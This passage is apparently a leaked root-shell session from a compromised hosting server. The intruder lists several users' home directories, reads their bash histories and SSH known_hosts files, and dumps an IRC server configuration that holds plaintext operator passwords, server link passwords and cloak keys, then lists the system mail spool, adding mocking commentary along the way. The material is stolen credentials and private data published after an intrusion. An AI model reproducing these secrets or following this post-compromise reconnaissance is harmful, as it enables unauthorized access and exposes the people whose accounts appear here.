drwxrwxr-x 3 evilcode evilcode 4096 Mar 25 13:44 newircd lrwxrwxrwx 1 evilcode evilcode 36 Aug 1 2007 public_html -> ./domains/evilcoders.net/public_html -rw-r----- 1 evilcode mail 34 Aug 7 2007 .shadow drwx------ 13 evilcode evilcode 4096 Mar 25 13:44 Unreal3.2 [root@demon2 evilcode]# cd ../excodeirc [root@demon2 excodeirc]# ls -al total 65128 drwx--x--x 25 excodeirc excodeirc 4096 Apr 14 22:26 . drwx--x--x 50 root root 4096 Mar 27 16:19 .. drwxrwxr-x 7 excodeirc excodeirc 4096 May 27 2006 anope-1.6.4 -rw-rw-r-- 1 excodeirc excodeirc 3840000 Sep 8 2005 anope-1.6.4.tar drwxr-xr-x 7 excodeirc excodeirc 4096 Jun 19 2007 anope-1.7.19 -rw-rw-r-- 1 excodeirc excodeirc 1505639 Jun 10 2007 anope-1.7.19.tar.gz drwxrwxr-x 2 excodeirc excodeirc 4096 Feb 10 12:47 back drwx------ 2 excodeirc excodeirc 4096 Aug 1 2007 backups -rw------- 1 excodeirc excodeirc 11324 Apr 14 23:11 .bash_history -rw-r--r-- 1 excodeirc excodeirc 304 Apr 28 2006 .bash_logout -rw-r--r-- 1 excodeirc excodeirc 191 Apr 28 2006 .bash_profile -rw-r--r-- 1 excodeirc excodeirc 124 Apr 28 2006 .bashrc drwxr-xr-x 4 excodeirc excodeirc 4096 Mar 25 19:58 defender drwx--x--x 5 excodeirc excodeirc 4096 Mar 17 18:08 domains drwxrwxr-x 10 excodeirc excodeirc 4096 Mar 22 20:57 eggdrop drwx------ 2 excodeirc excodeirc 4096 Jun 25 2007 .elinks -rw-r--r-- 1 excodeirc excodeirc 383 Apr 28 2006 .emacs drwxr-xr-x 3 root root 4096 Mar 22 20:56 hightechhost drwxrwx--- 5 excodeirc mail 4096 Mar 17 18:08 imap -rw-rw-r-- 1 excodeirc excodeirc 13375456 Jun 17 2007 ircbackup.tar.gz drwxrw-r-- 2 excodeirc excodeirc 4096 Jul 15 2007 .linuxcounter -rwxr-xr-x 1 excodeirc excodeirc 36620 Jan 21 2007 machine-update drwx------ 2 excodeirc excodeirc 4096 Mar 17 18:08 mail drwxrwxr-x 9 excodeirc excodeirc 4096 Jan 15 20:23 NeoStats3.0 -rw-rw-r-- 1 excodeirc excodeirc 32491520 Sep 2 2006 neostatsbackup.tar drwxrwxr-x 5 excodeirc excodeirc 4096 Apr 30 2006 OPSB-3.0.a3 -rw-rw-r-- 1 excodeirc excodeirc 1464320 Dec 13 2005 OPSB-3.0.a3.tar lrwxrwxrwx 1 excodeirc excodeirc 43 Aug 1 2007 public_html -> ./domains/irc.exploitercode.com/public_html drwxr-xr-x 4 excodeirc g00ns83 4096 Nov 30 14:27 randword-3.2 drwxrwxr-x 5 excodeirc excodeirc 4096 Apr 30 2006 SecureServ-3.0.a3 -rw-rw-r-- 1 excodeirc excodeirc 1904640 Dec 13 2005 SecureServ-3.0.a3.tar drwxrwxr-x 6 excodeirc excodeirc 4096 Dec 2 17:27 services drwxrwxr-x 7 excodeirc excodeirc 4096 Jun 19 2007 servicesnew -rw-r----- 1 excodeirc mail 34 Sep 17 2007 .shadow drwx------ 2 excodeirc excodeirc 4096 Dec 3 2006 .ssh drwxrwxrwx 13 excodeirc excodeirc 4096 Apr 30 2006 trunk -rw-rw-r-- 1 excodeirc excodeirc 9197056 Apr 30 2006 trunk.tar drwx------ 13 excodeirc excodeirc 4096 Apr 14 22:26 Unreal3.2 -rw-rw-r-- 1 excodeirc excodeirc 2629222 Feb 18 2007 Unreal3.2.6.tar.gz drwx------ 13 excodeirc excodeirc 4096 Feb 10 12:43 Unrealfuck drwx------ 13 excodeirc excodeirc 4096 Jun 17 2007 unrealold [root@demon2 excodeirc]# head .bash_history exit cd ls cd Ur* cd Un* nano 0w unreal* nano -w unreal* nano -w unrealircd* ./unreal restart ps ax [root@demon2 excodeirc]# tail .bash_history ls cd services ls nano services.conf cd /home/excodeirc ls cd anope-1.7.19 ls cd /home/excodeirc su [root@demon2 excodeirc]# ls -al .ssh total 12 drwx------ 2 excodeirc excodeirc 4096 Dec 3 2006 . drwx--x--x 25 excodeirc excodeirc 4096 Apr 14 22:26 .. -rw-r--r-- 1 excodeirc excodeirc 395 Dec 3 2006 known_hosts [root@demon2 excodeirc]# cat .ssh/* ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAm215adR0bmHDNKkjOQeI/ yN0P+F95L7z5Wjcp2JSs9fy2tZjFys6QIu9Pfuy6rQdkAayiTR1xXgh7+JTIWdJOW6I8jF8 nT1tQGmf1mT9s0P8cKtIJSMit+Ld78ZO+sC7e44YUqgn01zr6P7moPLE+Q5xIrZBzu49Yuw dzqacaLso8CnbsQDiM+gWvk7jd1Ox4PPjQYTzHX5fSxC1RrNI9GsRhb//i503HVIRLvjn1n wO1QBtHnqEhyYJD4VDLWXDkBqBHr2OQCzu8ex1UwoJ3j/ZxPYcQ49sbDkWaUpo7LMdsxvoA QE7igDNKDX0a2LJm2U1q7uwrwtmjYwJcKkmXw== [root@demon2 excodeirc]# ls -al eggdrop/*.conf -rw-r--r-- 1 excodeirc excodeirc 51580 Mar 22 20:57 eggdrop/eggdrop.conf [root@demon2 excodeirc]# cd Unreal3.2 Don't mind us, we're gonna cut out some crap like default comments from the unrealircd.conf [root@demon2 Unreal3.2]# cat unrealircd.conf loadmodule "src/modules/commands.so"; loadmodule "src/modules/cloak.so"; loadmodule "src/modules/m_getinfo.so"; loadmodule "src/modules/hideserver.so"; #loadmodule "src/modules/operpasswd.so"; include "spamfilter.conf"; me { name "p.60z.org"; info "Let the good times roll"; numeric 12; }; admin { "pr0be"; "pr0be@g00ns.net"; }; class clients { pingfreq 180; maxclients 5000; sendq 1000000000; recvq 8000; }; class servers { pingfreq 290; maxclients 100; /* Max servers we can have linked at a time */ sendq 999999999; connfreq 100000; /* How many seconds between each connection attempt */ }; oper pr0be { from { userhost "*@*"; }; password "spiggers666"; class "default"; flags { netadmin; services-admin; global; helpop; can_rehash can_globalnotice; can_globalroute; can_globops; can_wallops; can_unkline; can_kline; can_globalkill; can_zline; can_gkline; can_gzline; get_umodew; get_host; can_override; can_die; can_restart; }; }; oper sCuZz { from { userhost "*@*"; }; password "!beanerl0ve!"; class "default"; flags { netadmin; services-admin; global; helpop; can_rehash can_globalnotice; can_globalroute; can_globops; can_wallops; can_unkline; can_kline; can_globalkill; can_zline; can_gkline; can_gzline; get_umodew; get_host; can_override; can_die; can_restart; }; }; oper Genocide { from { userhost "*@*"; }; password "s,7B0L=QEtaS"; class "default"; flags { netadmin; services-admin; global; helpop; can_rehash can_globalnotice; can_globalroute; can_globops; can_wallops; can_unkline; can_kline; can_globalkill; can_zline; can_gkline; can_gzline; get_umodew; get_host; can_override; can_die; can_restart; }; }; allow { ip *@*; hostname *@*; class clients; maxperip 15; }; listen; listen; listen { options { ssl; clientsonly; }; }; listen { options { ssl; serversonly; }; }; except tkl { mask uid0@208.98.32.*; type { gline; gzline; qline; gqline; shun; }; }; /* link partyvan.us.hub { username *; hostname ; bind-ip *; port 10200; hub *; password-connect "oisdkgasdgweeab00"; password-receive "oisdkgasdgweeab00"; class servers; options { autoconnect; # zip; ssl; # nohostcheck; }; }; link lulz.hub { username *; hostname; bind-ip *; port 16969; hub *; password-connect "blarghh65vjh97t8c7hst8"; password-receive "blarghh65vjh97t8c7hst8"; class servers; options { autoconnect; ssl; }; }; link irc.evilcoders.net { username *; hostname; bind-ip *; port 6667; hub *; password-connect "dei8hw0u"; password-receive "dei8hw0u"; class servers; options { autoconnect; # zip; nohostcheck; }; }; */ ulines { #anonymous.services; s.60z.org; #partyvan.us.hub #defender.exploitercode.net; #irc.evilcoders.net; #stats.exploitercode.net; #uid0equalsroot.exploitercode.com; }; hideserver { disable-map yes; disable-links yes; map-deny-message "*** Command /map is disabled for security reasons"; links-deny-message "*** Command /links is disabled for security reasons"; hide { irc.exploitercode.net; irc.g00ns.net; s.60z.org; }; }; deny channel { channel "oreos"; reason "Grow up"; }; ban nick { mask "PwNd-*"; reason "bots"; }; /* Network configuration */ set { network-name "goodtimes"; default-server "irc.exploitercode.net"; services-server "s.60z.org"; # stats-server "stats.exploitercode.net"; help-channel "#Help"; hiddenhost-prefix "aintgay"; /* prefix-quit "no"; */ cloak-keys { qofdie998H99mF97f97MF9; myc886C8V7tmv87tmvcM6C; 42ZA643ZXn6745eC87r6VM; }; /* on-oper host */ hosts { local "LocOp.exploitercode.net"; global "IRCOp.exploitercode.net"; coadmin "CoAdmin.exploitercode.net"; admin "Admin.exploitercode.net"; servicesadmin "CsOps.exploitercode.net"; netadmin "NetAdmin.exploitercode.net"; host-on-oper-up "no"; }; }; /* Server specific configuration */ set { kline-address "uid0@exploitercode.net"; modes-on-connect "+x"; modes-on-oper "+xwgs"; oper-auto-join "#spk"; dns { nameserver; timeout 2s; retries 2; }; options { hide-ulines; /* You can enable ident checking here if you want */ /* identd-check; */ show-connect-info; }; maxchannelsperuser 1000000; /* The minimum time a user must be connected before being allowed to use a QUIT message, * This will hopefully help stop spam */ anti-spam-quit-message-time 10s; oper-only-stats "okfGsMRUEelLCXzdD"; /* Throttling: this example sets a limit of 3 connections per 60s (per host). */ throttle { connections 3; period 60s; }; /* Anti flood protection */ anti-flood { nick-flood 3:60; /* 3 nickchanges per 60 seconds (the default) */ }; /* Spam filter */ spamfilter { ban-time 1d; /* default duration of a *line ban set by spamfilter */ ban-reason "Spam/Advertising"; /* default reason */ virus-help-channel "#help"; /* channel to use for 'viruschan' action */ /* except "#help"; channel to exempt from filtering */ }; }; [root@demon2 Unreal3.2]# cd .. [root@demon2 excodeirc]# cd services [root@demon2 services]# ls backups dbz.zip hosts.db listnicks news.db services tables.sql bot.db example.conf languages logs nick.db services.chk chan.db exception.db listchans modules oper.db services.conf [root@demon2 services]# [root@demon2 services]# cd /home/felosi [root@demon2 felosi]# ls -al total 91140 drwx--x--x 7 felosi felosi 4096 Feb 10 12:51 . drwx--x--x 50 root root 4096 Mar 27 16:19 .. -rw-r--r-- 1 felosi felosi 72806123 Oct 5 2007 backup-10.5.2007_21-30-03_hywdinfo.tar.gz -rw------- 1 felosi felosi 403 Dec 28 11:46 .bash_history -rw-r--r-- 1 felosi felosi 24 Aug 3 2007 .bash_logout -rw-r--r-- 1 felosi felosi 176 Aug 3 2007 .bash_profile -rw-r--r-- 1 felosi felosi 124 Aug 3 2007 .bashrc -rw-rw-r-- 1 felosi felosi 6136 Aug 29 2007 da.cpanel.import.9beta2.tar.gz -rwxrwxrwx 1 felosi felosi 20561 Aug 29 2007 da.cpanel.import.pl -rwxrwxrwx 1 felosi felosi 280 Oct 5 2007 defaults.conf drwx--x--x 5 felosi felosi 4096 Aug 3 2007 domains -rw-r----- 1 felosi felosi 20324841 Nov 12 16:31 earn.tar.gz drwxrwxr-x 2 felosi felosi 4096 Oct 5 2007 export drwxrwxr-x 2 felosi felosi 4096 Oct 5 2007 import -rw-r----- 1 felosi mail 34 Aug 3 2007 .shadow drwx--x--x 2 felosi felosi 4096 Dec 28 11:35 user_backups drwxr-xr-x 3 felosi felosi 4096 Dec 13 22:41 webmail [root@demon2 felosi]# cat .bash_history cd ls wget http://kade.nu/da/da.cpanel.import.9beta2.tar.gz tar zxvf da.cpanel.import.9beta2.tar.gz chmod 777 da.cpanel.import.pl defaults.conf mkdir import export nano -w defaults.conf ls ls ls ls import ls user* ls cp backup-10.5.2007_21-30-03_hywdinfo.tar.gz import per *.pl perl *.pl cd export ls cp hywdinfo.tar.gz ../user_backups ls cd ../user_backups ls exit cd cd user_* ls ls ftp sph1.net exit [root@demon2 felosi]# cd ../felosii [root@demon2 felosii]# ls -al total 48 drwx--x--x 6 felosii felosii 4096 Aug 1 2007 . drwx--x--x 50 root root 4096 Mar 27 16:19 .. drwx------ 2 felosii felosii 4096 Aug 1 2007 backups -rw-r--r-- 1 felosii felosii 24 Jun 30 2007 .bash_logout -rw-r--r-- 1 felosii felosii 191 Jun 30 2007 .bash_profile -rw-r--r-- 1 felosii felosii 124 Jun 30 2007 .bashrc drwx--x--x 3 felosii felosii 4096 Jun 30 2007 domains -rw-r--r-- 1 felosii felosii 383 Jun 30 2007 .emacs drwxrwx--- 3 felosii felosii 4096 Aug 1 2007 imap drwx------ 2 felosii felosii 4096 Aug 1 2007 mail lrwxrwxrwx 1 felosii felosii 36 Aug 1 2007 public_html -> ./domains/felosi-inc.net/public_html -rw-r----- 1 felosii mail 34 Jun 30 2007 .shadow [root@demon2 felosii]# cd ../g00ns83 [root@demon2 g00ns83]# ls -al total 64 drwx--x--x 9 g00ns83 g00ns83 4096 Apr 18 21:47 . drwx--x--x 50 root root 4096 Mar 27 16:19 .. drwxrwxr-x 4 g00ns83 g00ns83 4096 Apr 18 21:52 backup drwx------ 2 g00ns83 g00ns83 4096 Aug 2 2007 backups -rw------- 1 g00ns83 g00ns83 2218 Dec 30 11:59 .bash_history -rw-r--r-- 1 g00ns83 g00ns83 24 Aug 2 2007 .bash_logout -rw-r--r-- 1 g00ns83 g00ns83 176 Aug 2 2007 .bash_profile -rw-r--r-- 1 g00ns83 g00ns83 124 Aug 2 2007 .bashrc -rw------- 1 g00ns83 g00ns83 232 Apr 18 21:47 .clipboard.txt drwxr-xr-x 3 g00ns83 g00ns83 4096 Aug 2 2007 domains drwxrwx--- 3 g00ns83 g00ns83 4096 Aug 2 2007 imap drwx------ 2 g00ns83 g00ns83 4096 Aug 2 2007 mail drwxrwx--- 15 g00ns83 g00ns83 4096 Aug 2 2007 Maildir lrwxrwxrwx 1 g00ns83 g00ns83 37 Aug 2 2007 public_html -> ./domains/g00ns-forum.net/public_html -rw-r----- 1 g00ns83 mail 34 Mar 7 19:56 .shadow drwxr-xr-x 3 g00ns83 g00ns83 4096 Jan 29 11:45 webmail [root@demon2 g00ns83]# cat .bash_history cd cd public_html ls mv index.html indexold nano -w includes/config.php exit id mc exit ls find c99 cd public_html ls ls admin1cp/ ls ls arc ls archive ls clientscript ls donations ls customavatars/ ls wls ls nex mkdir /home/g00ns83/backup mv nex/Seminar2.rar /home/g00ns83/backup ls ls nex rm -rf nex ls ls spic mv omg.html /home/g00ns83/backup ls nano in.php nano indexold mv indexold /home/g00ns83/backup ls ls hax rm -rf hax ls nano calendar.php mv sawnmapscan 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2007 admin1cp -rw-r--r-- 1 g00ns83 g00ns83 15770 Jun 19 2007 ajax.php -rw-rw-r-- 1 g00ns83 g00ns83 16362 Jun 19 2007 announcement.php drwxr-xr-x 6 g00ns83 g00ns83 4096 Oct 28 09:25 anymedia -rw-r--r-- 1 g00ns83 g00ns83 81511 Apr 16 21:48 arcade.php drwxrwxr-x 2 g00ns83 g00ns83 4096 Aug 2 2007 archive -rw-rw-r-- 1 g00ns83 g00ns83 453 May 11 2005 arrow.jpg -rw-rw-r-- 1 g00ns83 g00ns83 15360 Jun 19 2007 attachment.php drwxr-xr-x 2 g00ns83 g00ns83 4096 Aug 22 2007 ava drwxr-xr-x 3 g00ns83 g00ns83 4096 Aug 2 2007 botnets -rw-rw-r-- 1 g00ns83 g00ns83 74718 Jun 19 2007 calendar.php drwxr-xr-x 2 g00ns83 g00ns83 4096 Aug 2 2007 cgi-bin -rw-rw-r-- 1 g00ns83 g00ns83 43 Jun 19 2007 clear.gif drwxrwxr-x 5 g00ns83 g00ns83 4096 Oct 28 09:26 clientscript drwxrwxr-x 8 g00ns83 g00ns83 4096 Aug 2 2007 cpstyles -rw-rw-r-- 1 g00ns83 g00ns83 3266 Jun 19 2007 cron.php drwxrwxr-x 3 g00ns83 g00ns83 4096 Aug 2 2007 customavatars drwxr-xr-x 3 g00ns83 g00ns83 4096 Aug 2 2007 customprofilepics drwxr-xr-x 2 g00ns83 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4096 Aug 1 2007 backups -rw------- 1 g00nsts395 g00nsts395 15363 Apr 16 20:43 .bash_history -rw-r--r-- 1 g00nsts395 g00nsts395 304 Jun 3 2006 .bash_logout -rw-r--r-- 1 g00nsts395 g00nsts395 191 Jun 3 2006 .bash_profile -rw-r--r-- 1 g00nsts395 g00nsts395 124 Jun 3 2006 .bashrc drwx--x--x 3 g00nsts395 g00nsts395 4096 Jun 3 2006 domains drwx------ 2 g00nsts395 g00nsts395 4096 Sep 20 2006 .elinks -rw-r--r-- 1 g00nsts395 g00nsts395 383 Jun 3 2006 .emacs drwxrwx--- 3 g00nsts395 g00nsts395 4096 Aug 1 2007 imap drwx------ 2 g00nsts395 g00nsts395 4096 Aug 1 2007 mail lrwxrwxrwx 1 g00nsts395 g00nsts395 34 Aug 1 2007 public_html -> ./domains/ts.g00ns.net/public_html -rw-r----- 1 g00nsts395 mail 34 Aug 21 2007 .shadow drwxr-xr-x 7 g00nsts395 g00nsts395 4096 Apr 16 20:01 ts drwxrwxr-x 3 g00nsts395 g00nsts395 4096 Dec 24 18:25 ts2afd -rw-rw-r-- 1 g00nsts395 g00nsts395 1155345 Apr 16 19:57 ts2_server_rc2_202319.tar.bz2 drwxr-xr-x 7 g00nsts395 g00nsts395 4096 Apr 16 19:59 tss2_rc2 [root@demon2 g00nsts395]# head .bash_history quit exit ls tar -xjf ts2_server_rc2_20201.tar.bz2 ls rm ts2_server_rc2_20201.tar.bz2 ls cd tss2_rc2/ ls ./teamspeak2-server_startscript start [root@demon2 g00nsts395]# tail .bash_history cd ts ls ./teamspeak2-server_startscript stop rm server.log ./teamspeak2-server_startscript start cd $home ls cd tss2_rc2/ ls nano server.log [root@demon2 g00nsts395]# cd ../pr0be/ [root@demon2 pr0be]# ls -al total 44 drwx--x--x 5 564 565 4096 Mar 9 11:56 . drwx--x--x 50 root root 4096 Mar 27 16:19 .. -rw------- 1 564 565 218 Jan 5 00:12 .bash_history -rw-r--r-- 1 564 565 24 Jan 4 23:06 .bash_logout -rw-r--r-- 1 564 565 176 Jan 4 23:06 .bash_profile -rw-r--r-- 1 564 565 124 Jan 4 23:06 .bashrc drwx--x--x 3 564 565 4096 Jan 4 23:20 domains drwxrwx--- 3 564 mail 4096 Jan 4 23:20 imap drwx------ 2 564 565 4096 Jan 4 23:20 mail lrwxrwxrwx 1 564 565 31 Jan 4 23:20 public_html -> ./domains/probe.net/public_html -rw-r----- 1 564 mail 34 Jan 4 23:20 .shadow [root@demon2 pr0be]# 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.mailboxlist lrwxrwxrwx 1 sn00g3s sn00g3s 31 Aug 1 2007 public_html -> ./domains/g00ns.net/public_html drwx------ 18 sn00g3s sn00g3s 4096 Jul 8 2007 pubold -rw-r----- 1 sn00g3s mail 34 Dec 16 16:31 .shadow drwx------ 2 sn00g3s sn00g3s 4096 May 22 2007 .ssh drwxr-xr-x 3 sn00g3s sn00g3s 4096 Aug 25 2007 webmail [root@demon2 sn00g3s]# ls -al .ssh/ total 12 drwx------ 2 sn00g3s sn00g3s 4096 May 22 2007 . drwx--x--x 10 sn00g3s sn00g3s 4096 Apr 3 01:33 .. -rw-r--r-- 1 sn00g3s sn00g3s 224 May 22 2007 known_hosts [root@demon2 sn00g3s]# cat .ssh/* ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAvMKDvuIjkr3pTrFe7S4M83WnL sGkTn7rUcLm/l+PIrrjvWFh2Q0uFAlxD78spDpEtz/1A9ANS8MBUXrD0nSRC51iSVrOfNTOsmiay 3Ik1fxUIHshwqRUO8OmZt4pENPl9HNIsmFjLThyBNVEm9VA5m6fclTW6s1QW6+47WZZrEk= [root@demon2 sn00g3s]# cd public_html/ [root@demon2 public_html]# ls -al total 208672 drwx--x--x 28 sn00g3s sn00g3s 4096 Apr 3 01:40 . drwx--x--x 8 sn00g3s sn00g3s 4096 Aug 28 2007 .. -rw-r--r-- 1 sn00g3s sn00g3s 10 Jul 22 2007 403.shtml -rw-r--r-- 1 sn00g3s sn00g3s 9 Jul 22 2007 404.shtml -rw-r--r-- 1 sn00g3s sn00g3s 4283 Dec 15 12:35 about.php d--------- 2 sn00g3s sn00g3s 4096 Sep 21 2006 admin -rw-r--r-- 1 sn00g3s sn00g3s 169072 Aug 6 2007 around.png d--------- 2 sn00g3s sn00g3s 4096 Sep 21 2006 author ---------- 1 sn00g3s sn00g3s 2746 Sep 21 2006 author.php d--------- 2 sn00g3s sn00g3s 4096 Sep 21 2006 authors -rw-r--r-- 1 sn00g3s sn00g3s 6913 Jul 22 2007 auto.tar.gz -rw-r--r-- 1 sn00g3s sn00g3s 2956 Aug 6 2007 backcontent.png -rw-r--r-- 1 sn00g3s sn00g3s 97 Aug 6 2007 back.png drwxr-xr-x 2 sn00g3s sn00g3s 4096 Sep 21 2006 cgi-bin -rw-r--r-- 1 sn00g3s sn00g3s 8557 Jul 8 2007 config.php -rw-r--r-- 1 sn00g3s sn00g3s 14901 Aug 6 2007 countdown.swf -rw-r--r-- 1 sn00g3s sn00g3s 19264 Jul 31 2007 csf.conf drwxr-xr-x 2 sn00g3s sn00g3s 4096 Sep 21 2006 css -rw-r--r-- 1 sn00g3s sn00g3s 1461 Sep 21 2006 fade.js -rw-r--r-- 1 sn00g3s root 6726 Jan 26 19:01 fagime -rw-r--r-- 1 sn00g3s sn00g3s 5169 Aug 11 2007 faqbackup.php -rw-r--r-- 1 sn00g3s sn00g3s 1150 Oct 3 2006 favicon.ico drwxr-xr-x 7 sn00g3s sn00g3s 4096 Sep 21 2006 feeds -rw-r--r-- 1 sn00g3s sn00g3s 20 Nov 5 2006 fm902i0342gk340ok-43l.php -rw-r--r-- 1 sn00g3s sn00g3s 3316 Sep 21 2006 forum.php -rw-r--r-- 1 sn00g3s sn00g3s 76244 Aug 16 2007 g00ns.png -rw-r--r-- 1 sn00g3s sn00g3s 65208 Dec 1 21:39 ggdg9.jpg drwxr-xr-x 3 sn00g3s root 4096 Dec 30 15:40 hal -rw-r--r-- 1 sn00g3s sn00g3s 2959 Sep 21 2006 hallbkp.php -rw-r--r-- 1 sn00g3s sn00g3s 696 Sep 21 2006 hall_def.php -rw-r--r-- 1 sn00g3s sn00g3s 2911 Aug 8 2007 hall.php -rw-r--r-- 1 sn00g3s sn00g3s 252038 Sep 21 2006 header750x1001.jpg -rw-r--r-- 1 sn00g3s sn00g3s 1828 Sep 21 2006 headlinebox.html -rw-r--r-- 1 sn00g3s sn00g3s 529 Feb 21 22:28 .htaccess drwxr-xr-x 3 sn00g3s root 4096 Dec 6 2003 image drwxr-xr-x 3 sn00g3s sn00g3s 4096 Aug 18 2007 images drwxrwxrwx 7 sn00g3s sn00g3s 4096 Jun 19 2007 includes -rw-r--r-- 1 sn00g3s sn00g3s 9001 Dec 13 2006 index1.php -rw-rw-r-- 1 sn00g3s sn00g3s 8885 Jul 8 2007 index.2.php -rw-r--r-- 1 sn00g3s root 6948 Dec 16 11:29 index.bak2 -rw-r--r-- 1 sn00g3s sn00g3s 8290 Jul 29 2007 indexbkp.php -rw-r--r-- 1 sn00g3s sn00g3s 42 Jul 17 2007 indexold -rw-r--r-- 1 sn00g3s sn00g3s 42 Jul 17 2007 index.old -rw-r--r-- 1 sn00g3s sn00g3s 7112 Feb 5 13:27 index.php -rw-r--r-- 1 sn00g3s sn00g3s 7927 Aug 11 2007 indexwj.php -rw-r--r-- 1 sn00g3s root 22 Dec 17 23:15 info.php -rw-r--r-- 1 sn00g3s sn00g3s 2109 Apr 3 01:39 irccheck2.php -rw-r--r-- 1 sn00g3s sn00g3s 550 Apr 21 13:24 irccheck.txt -rw-r--r-- 1 sn00g3s sn00g3s 4431 Apr 3 01:39 irc.php drwxr-xr-x 2 sn00g3s sn00g3s 4096 Sep 21 2006 js drwxr-xr-x 2 sn00g3s sn00g3s 4096 Mar 31 21:03 kat -rw-r--r-- 1 sn00g3s root 256 Oct 19 2007 lic_req.bin -rw-r--r-- 1 sn00g3s sn00g3s 57368852 Jul 19 2007 linux-grsec- -rw-r--r-- 1 sn00g3s root 104042878 Aug 13 2007 linux.tar.gz drwxr-xr-x 3 sn00g3s sn00g3s 4096 Feb 21 22:12 live -rwxrwxrwx 1 sn00g3s sn00g3s 1 Mar 31 19:01 lollevel.txt -rw-r--r-- 1 sn00g3s sn00g3s 623 Jun 24 2007 members.php -rw-r--r-- 1 sn00g3s root 0 Dec 17 23:14 nano -rw-r--r-- 1 sn00g3s sn00g3s 4402 Apr 1 02:07 offline.png drwxr-xr-x 2 sn00g3s sn00g3s 4096 Jul 17 2007 oldfiles_july18 -rw-r--r-- 1 sn00g3s sn00g3s 4458 Apr 1 02:07 online.png -rw-r--r-- 1 sn00g3s sn00g3s 1609 Aug 12 2007 pics.php -rw-r--r-- 1 sn00g3s sn00g3s 3041 Sep 21 2006 radio.php -rw-r--r-- 1 sn00g3s sn00g3s 148 Aug 11 2007 read.php -rw-r--r-- 1 sn00g3s sn00g3s 1886 Sep 21 2006 rss.html -rw-r--r-- 1 sn00g3s sn00g3s 1715 Aug 11 2007 rss.php -rw-r--r-- 1 sn00g3s sn00g3s 259 Sep 21 2006 sb_javascript.js drwxr-xr-x 2 sn00g3s root 4096 Dec 6 2003 script -rw-r--r-- 1 sn00g3s root 41162814 Feb 9 20:12 sc_serv.log ---------- 1 sn00g3s sn00g3s 615 Jul 18 2007 secnews.php -rw-r--r-- 1 sn00g3s sn00g3s 17544 Aug 6 2007 selector.swf drwxr-xr-x 2 sn00g3s sn00g3s 4096 Oct 1 2006 shout drwxr-xr-x 2 sn00g3s sn00g3s 4096 Sep 21 2006 shout1 drwxr-xr-x 3 sn00g3s sn00g3s 4096 Sep 21 2006 shoutcast ---------- 1 sn00g3s sn00g3s 6492 Jun 24 2007 site_members.php d--------- 3 sn00g3s sn00g3s 4096 Mar 21 16:26 sn00gadminkthnx99 -rwxr-xr-x 1 sn00g3s sn00g3s 59 Jul 8 2007 sn00gnews.php -rw-r--r-- 1 sn00g3s root 10026 Dec 16 12:33 snow.zip drwxr-xr-x 2 sn00g3s sn00g3s 4096 Aug 7 2007 spicvbtemp99 -rw-r--r-- 1 sn00g3s sn00g3s 3193 Aug 11 2007 stereo.php drwxr-xr-x 3 sn00g3s sn00g3s 4096 Feb 21 22:06 stream -rw-r--r-- 1 sn00g3s sn00g3s 5390 Dec 15 12:47 style.css -rw-r--r-- 1 sn00g3s sn00g3s 1599 Sep 21 2006 tablebkp.php -rw-r--r-- 1 sn00g3s sn00g3s 1581 Aug 7 2007 table.php drwxr-xr-x 3 sn00g3s sn00g3s 4096 Aug 18 2007 tag -rw-r--r-- 1 sn00g3s sn00g3s 14837 Aug 11 2007 tag.php drwxr-xr-x 2 sn00g3s sn00g3s 4096 Jun 24 2007 teamspeakdisplay -rw-r--r-- 1 sn00g3s sn00g3s 616 Jul 18 2007 technews.php -rw-rw-r-- 1 sn00g3s sn00g3s 954 Aug 4 2007 template.tar.gz drwxr-xr-x 3 sn00g3s root 4096 Dec 16 11:24 themes -rw-r--r-- 1 sn00g3s sn00g3s 2848 Aug 6 2007 title.png drwxr-xr-x 4 sn00g3s sn00g3s 4096 Feb 8 13:43 tribal drwxr-xr-x 3 sn00g3s sn00g3s 4096 Sep 21 2006 ts -rw-r--r-- 1 sn00g3s sn00g3s 3682 Aug 11 2007 ts.php -rw-r--r-- 1 sn00g3s root 12033 Jan 6 17:30 udpips -rw-r--r-- 1 sn00g3s sn00g3s 14047 Jul 8 2007 vboutput1.php -rw-r--r-- 1 sn00g3s root 9750649 Oct 6 2007 ZendOptimizer-3.3.0-linux-glibc21-i386.tar.gz [root@demon2 public_html]# cat /home/sn00g3s/domains/g00ns.net/public_html/includes/config.php ( crap may be removed ) [root@demon2 public_html]# cd /var/spool/mail [root@demon2 mail]# ls -al total 75300 drwxrwxr-x 2 root mail 4096 Apr 21 14:55 . drwxr-xr-x 11 root root 4096 Jul 31 2007 .. -rw-rw---- 1 admin admin 314211 Sep 19 2007 admin -rw-rw---- 1 alliancedn alliancedn 0 Apr 27 2006 alliancedn -rw-rw---- 1 aosw aosw 1013473 Oct 18 2007 aosw -rw-rw---- 1 apache mail 4736 Aug 22 2007 apache -rw-rw---- 1 barnseo barnseo 1987728 Apr 21 09:59 barnseo -rw-rw---- 1 bored bored 3487 Jul 18 2007 bored -rw-rw---- 1 churc0 churc0 0 Jun 24 2006 churc0 -rw-rw---- 1 connors connors 17044 Apr 7 11:33 connors -rw-rw---- 1 diradmin mail 69254 Mar 26 19:13 diradmin -rw-rw---- 1 egg mail 19916 Apr 14 23:10 egg -rw-rw---- 1 every every 3317388 Apr 21 14:38 every -rw-rw---- 1 evilcode evilcode 0 Apr 29 2006 evilcode -rw-rw---- 1 excodeirc excodeirc 0 Apr 28 2006 excodeirc -rw-rw---- 1 exploiterc exploiterc 0 Apr 27 2006 exploiterc -rw-rw---- 1 felosii felosii 0 Jun 30 2007 felosii -rw-rw---- 1 g00ns83 mail 9074189 Apr 21 14:49 g00ns83 -rw-rw---- 1 g00nsts395 g00nsts395 0 Jun 3 2006 g00nsts395 -rw-rw---- 1 grumpy grumpy 284648 Mar 1 10:51 grumpy -rw-rw---- 1 hthhost mail 118701 Apr 12 15:26 hthhost -rw-rw---- 1 illmob illmob 0 Apr 28 2006 illmob -rw-rw---- 1 lost mail 8398 Mar 27 07:48 lost -rw-rw---- 1 mail mail 1038 Aug 30 2007 mail -rw-rw---- 1 party party 182080 Feb 13 07:40 party -rw-rw---- 1 pingyill pingyill 60510303 Apr 21 14:55 pingyill -rw-rw---- 1 rageserver rageserver 0 Apr 28 2006 rageserver -rw-rw---- 1 robo robo 554 Jun 1 2007 robo -rw------- 1 root root 1765 Feb 10 14:01 root -rw-rw---- 1 sixtyz mail 4701 Apr 14 08:08 sixtyz -rw-rw---- 1 sn00g3s sn00g3s 0 Jun 8 2006 sn00g3s -rw-rw---- 1 void void 0 Jan 18 2007 void 